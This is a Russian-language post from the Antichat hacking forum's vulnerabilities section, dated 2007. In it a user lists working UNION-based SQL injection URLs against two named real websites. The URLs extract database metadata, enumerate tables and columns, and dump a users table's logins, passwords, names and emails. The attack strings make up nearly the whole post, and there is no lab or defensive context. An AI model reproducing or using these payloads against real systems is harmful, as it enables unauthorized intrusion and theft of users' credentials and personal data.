ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 30.03.2007, 17:15
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Т.к. скуля выводит все записи (все строки), то там где много ограничил её лимитом с 0 по 15 запись:

Код:
http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(database(),char(58),user(),char(58),version())/*
http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+0,15/*

http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(110,101,117,95,117,115,101,114,115)/*
http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(id,char(58),login,char(58),password,char(58),name,char(58),email)+from+bers.neu_users/*

http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(97,100,109,105,110,115)+limit+0,15/*

Код:
http://www.istrodina.com/rodina_articul.php3?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12,13,14/*

Последний раз редактировалось Grey; 30.03.2007 в 17:17..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ